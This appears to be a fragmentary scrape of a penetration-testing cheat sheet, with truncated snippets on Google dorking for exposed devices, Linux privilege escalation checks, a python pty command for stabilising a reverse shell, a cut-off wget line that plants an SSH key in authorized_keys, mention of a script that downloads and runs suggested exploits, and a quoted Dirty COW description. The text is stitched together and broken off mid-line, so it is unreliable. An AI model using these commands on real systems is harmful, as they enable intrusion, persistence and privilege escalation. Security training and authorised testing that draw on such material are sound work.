Google search to find website subdomains
Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf
Google Hacking Database:
Set the Target IP Address to the $ip system variable
Find the location of a file
Search through directories in the $PATH environment variable
Search for a file that contains a specific string in its name:
find / -name sbd\*
Show active int...
Scripts to run
The following script runs exploit suggester and automatically downloads and executes suggested exploits:
Linux elevation of privileges, manual testing
Things to look for: misconfigured services (cron jobs), incorrect file permissions (exportfs, sudo), misconfigured environment ($PATH), binaries with the SUID bit set, software or OS with known vulnerabilities.
First try simple sudo:
$ sudo su -
What can we run with sudo?
$ sudo -l
Try su as all users ...
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH, TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Add public key to authorized keys:
$ echo $(wget https://A...
Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...